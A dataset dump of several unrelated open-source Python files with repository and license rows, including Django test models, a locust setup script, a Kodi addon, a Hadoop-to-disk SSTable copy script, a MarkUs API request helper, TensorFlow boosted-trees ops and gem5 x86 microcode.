album = models.ForeignKey(Album)
original_release = models.DateField(editable=False)
class Meta:
ordering = ('title',)
def __str__(self):
return self.title
def readonly_method_on_model(self):
# does nothing
pass
class TwoAlbumFKAndAnE(models.Model):
album1 = models.ForeignKey(Album, related_name="album1_set")
album2 = models.ForeignKey(Album, related_name="album2_set")
e = models.CharField(max_length=1)
class Author(models.Model):
name = models.CharField(max_length=100)
class Book(models.Model):
name = models.CharField(max_length=100)
subtitle = models.CharField(max_length=100)
price = models.FloatField()
authors = models.ManyToManyField(Author, through='AuthorsBooks')
class AuthorsBooks(models.Model):
author = models.ForeignKey(Author)
book = models.ForeignKey(Book)
class State(models.Model):
name = models.CharField(max_length=15)
class City(models.Model):
state = models.ForeignKey(State)
|
bsd-3-clause
|
edx/locust
|
setup.py
|
5
|
1581
|
# encoding: utf-8
from setuptools import setup, find_packages, Command
import sys, os
version = '0.7.2'
class Unit2Discover(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
import sys, subprocess
basecmd = ['unit2', 'discover']
errno = subprocess.call(basecmd)
raise SystemExit(errno)
setup(
name='locustio',
version=version,
description="Website load testing framework",
long_description="""Locust is a python utility for doing easy, distributed load testing of a web site""",
classifiers=[
"Topic :: Software Development :: Testing :: Traffic Generation",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
],
keywords='',
author='Jonatan Heyman, Carl Bystrom, Joakim Hamrén, Hugo Heyman',
author_email='',
url='http://locust.io',
license='MIT',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=["gevent>=1.0.1", "flask>=0.10.1", "requests>=2.4.1", "msgpack-python>=0.4.2"],
tests_require=['unittest2', 'mock', 'pyzmq'],
entry_points={
'console_scripts': [
'locust = locust.main:main',
]
},
test_suite='unittest2.collector',
)
|
mit
|
dandygithub/kodi
|
addons/script.module.dandy.search.history/plugin.py
|
1
|
2321
|
# -*- coding: utf-8 -*-
# Writer (c) 2019, dandy
# Rev. 1.0.0
# Licence: GPL v.3: http://www.gnu.org/copyleft/gpl.html
import xbmc
import xbmcaddon
import xbmcplugin
import xbmcgui
import XbmcHelpers as common
import resources.lib.SearchHistory as history
ID = 'script.module.dandy.search.history'
ADDON = xbmcaddon.Addon(ID)
PATH = ADDON.getAddonInfo('path')
HANDLE = int(sys.argv[1]) if (len(sys.argv) > 1) else None
PARAMS = sys.argv[2] if (len(sys.argv) > 2) else None
ICON = ADDON.getAddonInfo('icon')
def exist_us():
result = False
try:
addon_us = xbmcaddon.Addon("plugin.video.united.search")
result = True
except:
pass
return result
def list_items():
words = history.get_history()
exist = exist_us()
for word in reversed(words):
if (exist == True):
uri = "plugin://plugin.video.united.search/?action=search&keyword=%s" % word
item = xbmcgui.ListItem(word, iconImage=ICON, thumbnailImage=ICON)
commands = []
uricmd = sys.argv[0] + '?mode=delete&keyword=%s' % word
commands.append(("[COLOR=orange]Delete[/COLOR] item", "Container.Update(%s)" % (uricmd), ))
item.addContextMenuItems(commands)
else:
uri = sys.argv[0] + '?mode=delete&keyword=%s' % word
item = xbmcgui.ListItem(word, iconImage=ICON, thumbnailImage=ICON)
xbmcplugin.addDirectoryItem(HANDLE, uri, item, False)
xbmcplugin.endOfDirectory(HANDLE, True)
def search_by_us(keyword):
uricmd = "plugin://plugin.video.united.search/?action=search&keyword=%s" % keyword
xbmc.executebuiltin("ActivateWindow(videos,%s)" % uricmd)
#xbmc.executebuiltin("Container.Update(%s)" % uricmd)
def delete_item(keyword):
if (xbmcgui.Dialog().yesno("", "", "Delete item from history?") == True):
words = history.delete_from_history(keyword)
xbmc.executebuiltin("Container.Update(%s)" % sys.argv[0])
def main():
params = common.getParameters(PARAMS)
mode = params['mode'] if 'mode' in params else None
keyword = params['keyword'] if 'keyword' in params else None
if (mode == "search"):
search_by_us(keyword)
if (mode == "delete"):
delete_item(keyword)
elif (mode is None):
list_items()
if __name__ == '__main__':
main()
|
gpl-3.0
|
haroldl/homeworklog
|
django/contrib/gis/db/backends/util.py
|
377
|
1749
|
"""
A collection of utility routines and classes used by the spatial
backends.
"""
def gqn(val):
"""
The geographic quote name function; used for quoting tables and
geometries (they use single rather than the double quotes of the
backend quotename function).
"""
if isinstance(val, basestring):
if isinstance(val, unicode): val = val.encode('ascii')
return "'%s'" % val
else:
return str(val)
class SpatialOperation(object):
"""
Base class for generating spatial SQL.
"""
sql_template = '%(geo_col)s %(operator)s %(geometry)s'
def __init__(self, function='', operator='', result='', **kwargs):
self.function = function
self.operator = operator
self.result = result
self.extra = kwargs
def as_sql(self, geo_col, geometry='%s'):
return self.sql_template % self.params(geo_col, geometry)
def params(self, geo_col, geometry):
params = {'function' : self.function,
'geo_col' : geo_col,
'geometry' : geometry,
'operator' : self.operator,
'result' : self.result,
}
params.update(self.extra)
return params
class SpatialFunction(SpatialOperation):
"""
Base class for generating spatial SQL related to a function.
"""
sql_template = '%(function)s(%(geo_col)s, %(geometry)s)'
def __init__(self, func, result='', operator='', **kwargs):
# Getting the function prefix.
default = {'function' : func,
'operator' : operator,
'result' : result
}
kwargs.update(default)
super(SpatialFunction, self).__init__(**kwargs)
|
bsd-3-clause
|
Eward5513/oceanbase
|
oceanbase_0.4/script/data_dispatcher/copy_sstable.py
|
13
|
7762
|
#!/usr/bin/python2.6
import os
import sys
import Queue
import threading
from subprocess import Popen, PIPE, STDOUT
import copy
import time
import re
import logging
class ExecutionError(Exception): pass
class Shell:
@classmethod
def sh(cls, cmd, host=None, username=None):
'''Execute a command locally or remotely
>>> Shell.sh('ls > /dev/null')
0
>>> Shell.sh('ls > /dev/null', host='10.232.36.29')
0
'''
if host is not None:
if username is not None:
cmd = "ssh {username}@{host} '{cmd}'".format(**locals())
else:
cmd = "ssh {host} '{cmd}'".format(**locals())
ret = os.system(cmd)
if ret != 0:
err_msg = 'Shell.sh({0}, host={1})=>{2}\n'.format(
cmd, host, ret);
sys.stderr.write(err_msg)
raise ExecutionError(err_msg)
else:
logging.debug('"{0}" Execute SUCCESS'.format(cmd))
return ret
@classmethod
def popen(cls, cmd, host=None, username=None):
'''Execute a command locally, and return
>>> Shell.popen('ls > /dev/null')
''
'''
if host is not None:
if username is not None:
cmd = "ssh {username}@{host} '{cmd}'".format(**locals())
else:
cmd = "ssh {host} '{cmd}'".format(**locals())
p = Popen(cmd, shell=True, stdout=PIPE, stderr=STDOUT)
output = p.communicate()[0]
err = p.wait()
if err:
output = 'Shell.popen({0})=>{1} Output=>"{2}"'.format(cmd, err, output)
raise ExecutionError(output)
return output
@classmethod
def scp(cls, src, host, dst, username=None):
'''remote copy
>>> Shell.scp('build1.py', '10.232.36.29', '')
0
'''
if username is not None:
cmd = 'scp {0} {1}@{2}:{3}'.format(src, username, host, dst)
else:
cmd = 'scp {0} {1}:{2}'.format(src, host, dst)
return Shell.sh(cmd)
@classmethod
def mkdir(cls, path, host=None):
'''make directory locally or remotely
>>> Shell.mkdir('test', host='10.232.36.29')
0
>>> Shell.mkdir('test')
0
'''
if host is None:
os.path.exists(path) or os.mkdir(path)
return 0
else:
return Shell.sh('mkdir -p {0}'.format(path), host)
class WorkerPool:
class Worker(threading.Thread):
def __init__(self, task_queue, status):
threading.Thread.__init__(self)
self.task_queue = task_queue
self.status = status
self.__stop = 0
self.err = None
def run(self):
#cwd = 'thread' + str(self.ident)
#Shell.mkdir(cwd)
while not self.__stop:
try:
task = self.task_queue.get(timeout=1)
task()
self.task_queue.task_done()
except Queue.Empty:
pass
except BaseException as e:
self.task_queue.task_done()
if self.err is None:
self.err = e
logging.error('thread' + str(self.ident) + ' ' + str(e))
if self.err is not None:
raise self.err
def stop(self):
self.__stop = True
class Status:
def __init__(self):
self.status = 0
def set_active(self):
self.status = 1
def set_idle(self):
self.status = 2
def is_idle(self):
self.status == 2
def __init__(self, num):
self.task_queue = Queue.Queue()
self.n = num
self.status = [WorkerPool.Status()] * num
self.workers = [None] * num
for i in range(num):
self.workers[i] = WorkerPool.Worker(self.task_queue, self.status[i]);
self.workers[i].start()
def add_task(self, task):
self.task_queue.put(task)
def all_idle(self):
for i in range(num):
if not self.status[i].is_idle():
return False
return True
def wait(self):
self.task_queue.join()
for w in self.workers:
w.stop()
def R(cmd, local_vars):
G = copy.copy(globals())
G.update(local_vars)
return cmd.format(**G)
class GetFromHadoop:
def __init__(self, task):
'''task should be a dict with these fields:
dir
files
'''
self.task = task
def __call__(self):
dir = self.task['dir']
files = self.task['files']
for f in files:
m = re.match(r'.*/([^/]+)', f)
if m is not None:
filename = m.group(1)
dest_dir = dir
tmp_dir = R('{dest_dir}/tmp', locals())
mkdir_tmp_dir = R('mkdir -p {tmp_dir}', locals())
hadoop_get_cmd = R('{hadoop_bin_dir}hadoop fs -get {f} {tmp_dir}', locals())
commit_mv_cmd = R('mv {tmp_dir}/{filename} {dest_dir}', locals())
logging.debug(mkdir_tmp_dir)
logging.debug(hadoop_get_cmd)
logging.debug(commit_mv_cmd)
Shell.sh(mkdir_tmp_dir)
Shell.sh(hadoop_get_cmd)
Shell.sh(commit_mv_cmd)
msg = R('Successfully get "{filename}" to "{dest_dir}"', locals())
logging.info(msg)
def round_inc(n, ceiling):
n += 1
if n >= ceiling:
n = 0
return n
def DoWork():
try:
wp = WorkerPool(thread_num)
dir_num = len(data_dir_list)
tasks = []
for i in range(dir_num):
tasks.append(dict(disk_id=None, files=[]))
file_list = []
hadoop_ls_cmd = R("{hadoop_bin_dir}hadoop fs -ls {input_dir}", locals())
logging.debug(hadoop_ls_cmd)
ls_output = Shell.popen(hadoop_ls_cmd).split('\n')
for l in ls_output:
m = re.match(r'^[-d].* ([^ ]+)$', l)
if m is not None:
file_list.append(m.group(1))
logging.debug(file_list)
disk_index = 0
for f in file_list:
if f != '':
tasks[disk_index]['files'].append(f)
disk_index = round_inc(disk_index, dir_num)
for i in range(dir_num):
tasks[i]['dir'] = data_dir_list[i]
logging.debug(str(tasks[i]))
wp.add_task(GetFromHadoop(tasks[i]))
finally:
wp.wait()
def gen_list(pattern):
match = re.search(r'\[(.+)\]', pattern)
if match is None:
return [pattern]
specifier = match.group(1)
match = re.match('([0-9]+)-([0-9]+)', specifier)
if not match:
raise Exception('illformaled range specifier: %s'%(specifier))
_start, _end = match.groups()
start,end = int(_start), int(_end)
formatter = re.sub('\[.+\]', '%0'+str(len(_start))+'d', pattern)
return [formatter%(x) for x in range(start, end+1)]
if __name__ == '__main__':
from optparse import OptionParser
parser = OptionParser()
parser.add_option('-b', '--hadoop_bin_dir',
help='Hadoop bin utils directory',
dest='hadoop_bin_dir')
parser.add_option('-i', '--input_dir',
help='Input directory in HDFS',
dest='input_dir')
parser.add_option('-d', '--data_dir',
help='bypass data directory, using [1-10] pattern representing 10 disks.'
'for example: "-d /data/[1-4]/ups_data/bypass"',
dest='data_dir')
parser.add_option('-t', '--thread_num',
help='thread number to get SSTable, default is 8',
dest='thread_num')
parser.add_option('-l', '--log_level',
help='Log level: ERROR, WARN, INFO, DEBUG',
dest='log_level')
(options, args) = parser.parse_args()
if (options.hadoop_bin_dir is None
or options.input_dir is None
or options.data_dir is None):
print(parser.format_help())
parser.exit(status=1)
hadoop_bin_dir = options.hadoop_bin_dir
input_dir = options.input_dir
data_dir = options.data_dir
data_dir_list = gen_list(data_dir)
if options.thread_num is not None:
thread_num = int(options.thread_num)
else:
thread_num = 8
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
if options.log_level is not None:
level = LEVELS.get(options.log_level.lower(), logging.NOTSET)
logging.basicConfig(level=level,
format='[%(asctime)s] %(levelname)s %(message)s')
DoWork()
|
gpl-2.0
|
selyanhb/Markus
|
lib/tools/api_helper.py
|
14
|
8102
|
#!/usr/bin/python
#
# The intention of this Python script is to provide
# MarkUs users with a tool which is able to generate HTTP's
# GET, PUT, DELETE and POST requests. This may be handy for
# users planning to use MarkUs' Web API.
#
## DISCLAIMER
#
# This script is made available under the OSI-approved
# MIT license. See http://www.markusproject.org/#license for
# more information. WARNING: This script is still considered
# experimental.
#
# (c) by the authors, 2008 - 2010.
#
import httplib, urllib, sys, socket, os
from optparse import OptionParser
from urlparse import urlparse
class InvalidParameterError(Exception):
""" Custom exception class. """
def __str__(self):
return "Invalid parameter format. Expected 'param=value param=value ...'"
def check_arguments(options, args, parser):
""" Checks if arguments passed to script are plausible.
Returns a ParseResult 6-tuple if successful. """
# Make sure args list may be valid
if len(sys.argv) < 6:
print >> sys.stderr, parser.get_usage()
sys.exit(1)
# Make sure HTTP request type is provided
if options.http_request_type == None:
print >> sys.stderr, "Request type is a required option."
sys.exit(1)
# Make sure API key is provided
elif options.api_key_file == None:
print >> sys.stderr, "API key is a required option."
sys.exit(1)
# Make sure an URL to post to is provided
elif options.url == None:
print >> sys.stderr, "URL is a required option."
sys.exit(1)
# Make sure we one of the supported request types
request = options.http_request_type.upper()
if (request not in ["PUT", "POST", "GET", "DELETE"]):
print >> sys.stderr, "Bad request type. Only GET, PUT, POST, DELETE are supported."
sys.exit(1)
# Binary file option only makes sense for PUT/POST
if ( request not in ["PUT", "POST"] and
options.binary_file != None and
len(options.binary_file) != 0 ):
print >> sys.stderr, "Binary file option only allowed for PUT and POST"
sys.exit(1)
# Sanity check URL (must be http/https)
parsed_url = urlparse(options.url.strip())
if parsed_url.scheme not in ["http", "https"]:
print >> sys.stderr, "Only http and https URLs are supported."
sys.exit(1)
return parsed_url
def submit_request(options, args, parsed_url):
""" Construct desired HTTP request, including proper auth header.
Pre: check_arguments has been run, i.e. we have a proper set of
arguments.
Post: Request crafted and submitted. Response status printed to stdout. """
# Read API key from file
if not os.path.isfile(options.api_key_file.strip()):
print >> sys.stderr, "%s: File not found!" % options.api_key_file.strip()
sys.exit(1)
try:
api_key_file = open(options.api_key_file.strip(), "r")
key = api_key_file.read().strip()
api_key_file.close()
except EnvironmentError:
print >> sys.stderr, "%s: Error reading file!" % options.api_key_file.strip()
sys.exit(1)
# Construct auth header string
auth_header = "MarkUsAuth %s" % key
# Prepare header parameter for connection. MarkUs auth header, plus
# need 'application/x-www-form-urlencoded' header for parameters to go through
headers = { "Authorization": auth_header,
"Content-type": "application/x-www-form-urlencoded" }
# Prepare parameters
params = urllib.urlencode(parse_parameters(options, args))
# HTTP or HTTPS?
try:
resp = None; conn = None
if parsed_url.scheme == "http":
conn = httplib.HTTPConnection(parsed_url.netloc)
elif parsed_url.scheme == "https":
conn = httplib.HTTPSConnection(parsed_url.netloc)
else:
# Should never get here, since we checked for http/https previously
print >> sys.stderr, "Panic! Neither http nor https URL."
sys.exit(1)
conn.request(options.http_request_type.upper(), parsed_url.path, params, headers)
resp = conn.getresponse()
print resp.status, resp.reason
if options.verbose == True: # Is verbose turned on?
data = resp.read()
print data
conn.close()
except httplib.HTTPException as e: # Catch HTTP errors
print >> sys.stderr, str(e)
sys.exit(1)
except socket.error, (value, message):
if value == 111: # Connection Refused
print >> sys.stderr, "%s: %s" % (parsed_url.netloc, message)
sys.exit(1)
else:
print >> sys.stderr, "%s: %s (Errno: %s)" % (parsed_url.netloc, message, value)
sys.exit(1)
def parse_parameters(options, raw_params):
params = {}
if (options.test_file is not None):
# Read test content from file
if not os.path.isfile(options.test_file.strip()):
print >> sys.stderr, "%s: File not found!" % options.test_file.strip()
sys.exit(1)
try:
test_file = open(options.test_file.strip(), "r")
content = test_file.read().strip()
test_file.close()
params["file_content"] = content
except EnvironmentError:
print >> sys.stderr, "%s: Error reading file!" % options.test_file.strip()
sys.exit(1)
""" Parses parameters passed in as arguments and returns them as a dict. """
try:
for param in raw_params:
try:
ind = param.index("=") # Find first '='
name = param[:ind]
value = param[(ind+1):] # exclude '='
params[name] = value
except ValueError:
# '=' delimiter not found => Illegal format
raise InvalidParameterError()
except InvalidParameterError as e:
print >> sys.stderr, str(e)
sys.exit(1)
return params
def main():
""" Setup options parser and kick off functions to carry out the actual tasks """
parser = OptionParser()
# We don't want to allow interspersed options
parser.disable_interspersed_args()
# Usage string
parser.usage = "%prog -r HTTP_R -k KEY -u URL [options] [param=value param=value ...]"
parser.usage += "\n\tTry: %prog -h for more information."
# Short description
parser.description = "MarkUs utility script to generate GET, PUT, POST, "
parser.description += "DELETE HTTP requests. It automatically crafts and sends HTTP requests"
parser.description += " to the specified MarkUs API URL."
# Define script options
parser.add_option("-k", "--key", action="store", type="string",
dest="api_key_file", help="File containing your API key for MarkUs. Required.")
parser.add_option("-t", "--test-file", action="store", type="string",
dest="test_file", help="File containing your test content for MarkUs. Will be ignored if file_content='...' is provided.")
parser.add_option("-r", "--request-type", dest="http_request_type",
action="store", type="string",
help="The HTTP request type to generate. One of {PUT,GET,POST,DELETE}. Required.")
parser.add_option("-u", "--url", dest="url", action="store", type="string",
help="The url of the resource to send the HTTP request to. Required.")
parser.add_option("-b", "--binary", dest="binary_file",
action="append", type="string",
help="Path to binary file. This works only for PUT and POST.")
parser.add_option("-v", "--verbose", dest="verbose",
action="store_true",
help="Print response body in addition to the HTTP status code and reason.")
(options, args) = parser.parse_args() # Get options and rest of arguments
# Arguments checking routine
parsed_url = check_arguments(options, args, parser)
# Request submission routine
submit_request(options, args, parsed_url)
# Run script's main function if it's not imported
if __name__ == "__main__":
main()
|
mit
|
adamtiger/tensorflow
|
tensorflow/contrib/boosted_trees/python/ops/stats_accumulator_ops.py
|
62
|
9211
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Stats Accumulator ops python wrappers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from tensorflow.contrib.boosted_trees.python.ops import batch_ops_utils
# pylint: disable=unused-import
from tensorflow.contrib.boosted_trees.python.ops import boosted_trees_ops_loader
# pylint: enable=unused-import
from tensorflow.contrib.boosted_trees.python.ops import gen_stats_accumulator_ops
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import resources
from tensorflow.python.training import saver
# Pattern to remove all non alpha numeric from a string.
_PATTERN = re.compile(r"[\W_]+")
class StatsAccumulator(saver.BaseSaverBuilder.SaveableObject):
"""A resource that allows to accumulate gradients and hessians.
For consistency guarantees, we use read and write stamp tokens.
The stamp token on the resource is updated with StatsAccumulator.flush.
Calls to StatsAccumulator.add that don't provide the current stamp token are
ignored.
"""
def __init__(self,
stamp_token,
gradient_shape,
hessian_shape,
name=None,
container=None):
"""Creates a stats accumulator and returns a handle to it.
Args:
stamp_token: An int64, initial value to use for the stamp token.
gradient_shape: A TensorShape, containing shape of gradients.
hessian_shape: A TensorShape, containing shape of hessians.
name: A name for the stats accumulator variable.
container: An optional `string`. Defaults to `""`.
Returns:
A `Tensor` of type mutable `string`. The handle to the stats accumulator.
"""
if name is not None:
name = _PATTERN.sub("", name)
with ops.name_scope(name, "StatsAccumulator") as name:
# Both values are scalars.
if (gradient_shape == tensor_shape.scalar() and
hessian_shape == tensor_shape.scalar()):
self._is_scalar = True
self._resource_handle = (gen_stats_accumulator_ops.
stats_accumulator_scalar_resource_handle_op(
container, name, name=name))
create_op = gen_stats_accumulator_ops.create_stats_accumulator_scalar(
self._resource_handle, stamp_token)
is_initialized_op = (
gen_stats_accumulator_ops.stats_accumulator_scalar_is_initialized(
self._resource_handle))
else:
self._is_scalar = False
self._resource_handle = (gen_stats_accumulator_ops.
stats_accumulator_tensor_resource_handle_op(
container, name, name=name))
create_op = gen_stats_accumulator_ops.create_stats_accumulator_tensor(
self._resource_handle, stamp_token, gradient_shape.as_list(),
hessian_shape.as_list())
is_initialized_op = (
gen_stats_accumulator_ops.stats_accumulator_tensor_is_initialized(
self._resource_handle))
self._create_op = create_op
slice_spec = ""
saver_name = self._resource_handle.name
(stamp_token, num_updates, partition_ids, feature_ids, gradients,
hessians) = self.serialize()
specs = [
saver.BaseSaverBuilder.SaveSpec(stamp_token, slice_spec,
saver_name + "_stamp"),
saver.BaseSaverBuilder.SaveSpec(num_updates, slice_spec,
saver_name + "_num_updates"),
saver.BaseSaverBuilder.SaveSpec(partition_ids, slice_spec,
saver_name + "_partition_ids"),
saver.BaseSaverBuilder.SaveSpec(feature_ids, slice_spec,
saver_name + "_feature_ids"),
saver.BaseSaverBuilder.SaveSpec(gradients, slice_spec,
saver_name + "_gradients"),
saver.BaseSaverBuilder.SaveSpec(hessians, slice_spec,
saver_name + "hessians"),
]
super(StatsAccumulator, self).__init__(self._resource_handle, specs, name)
resources.register_resource(self._resource_handle, create_op,
is_initialized_op)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, self)
def add(self, stamp_token, partition_ids, feature_ids, gradients, hessians):
"""Updates the stats accumulator."""
partition_ids, feature_ids, gradients, hessians = (self._make_summary(
partition_ids, feature_ids, gradients, hessians))
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_add(
[self._resource_handle], stamp_token, [partition_ids], [feature_ids],
[gradients], [hessians])
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_add(
[self._resource_handle], stamp_token, [partition_ids], [feature_ids],
[gradients], [hessians])
def schedule_add(self, partition_ids, feature_ids, gradients, hessians):
"""Schedules an update to the stats accumulator."""
partition_ids, feature_ids, gradients, hessians = (self._make_summary(
partition_ids, feature_ids, gradients, hessians))
if self._is_scalar:
return batch_ops_utils.ScheduledStampedResourceOp(
op=gen_stats_accumulator_ops.stats_accumulator_scalar_add,
resource_handle=self._resource_handle,
partition_ids=partition_ids,
feature_ids=feature_ids,
gradients=gradients,
hessians=hessians)
else:
return batch_ops_utils.ScheduledStampedResourceOp(
op=gen_stats_accumulator_ops.stats_accumulator_tensor_add,
resource_handle=self._resource_handle,
partition_ids=partition_ids,
feature_ids=feature_ids,
gradients=gradients,
hessians=hessians)
def _make_summary(self, partition_ids, feature_ids, gradients, hessians):
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_make_summary(
partition_ids, feature_ids, gradients, hessians)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_make_summary(
partition_ids, feature_ids, gradients, hessians)
def deserialize(self, stamp_token, num_updates, partition_ids, feature_ids,
gradients, hessians):
"""Resets the stats accumulator with the serialized state."""
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_deserialize(
self._resource_handle, stamp_token, num_updates, partition_ids,
feature_ids, gradients, hessians)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_deserialize(
self._resource_handle, stamp_token, num_updates, partition_ids,
feature_ids, gradients, hessians)
def flush(self, stamp_token, next_stamp_token):
"""Flushes the stats accumulator."""
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_flush(
self._resource_handle, stamp_token, next_stamp_token)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_flush(
self._resource_handle, stamp_token, next_stamp_token)
def serialize(self):
"""Serializes the stats accumulator state."""
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_serialize(
self._resource_handle)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_serialize(
self._resource_handle)
def restore(self, restored_tensors, unused_restored_shapes):
"""Restores the associated tree ensemble from 'restored_tensors'.
Args:
restored_tensors: the tensors that were loaded from a checkpoint.
unused_restored_shapes: the shapes this object should conform to after
restore. Not meaningful for trees.
Returns:
The operation that restores the state of the tree ensemble variable.
"""
with ops.control_dependencies([self._create_op]):
return self.deserialize(
stamp_token=restored_tensors[0],
num_updates=restored_tensors[1],
partition_ids=restored_tensors[2],
feature_ids=restored_tensors[3],
gradients=restored_tensors[4],
hessians=restored_tensors[5])
def resource(self):
return self._resource_handle
|
apache-2.0
|
HwisooSo/gemV-update
|
src/arch/x86/isa/insts/simd64/floating_point/arithmetic/multiplication.py
|
91
|
2452
|
# Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop PFMUL_MMX_MMX {
mmulf mmx, mmx, mmxm, size=4, ext=0
};
def macroop PFMUL_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
mmulf mmx, mmx, ufp1, size=4, ext=0
};
def macroop PFMUL_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
mmulf mmx, mmx, ufp1, size=4, ext=0
};
'''
|
bsd-3-clause
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.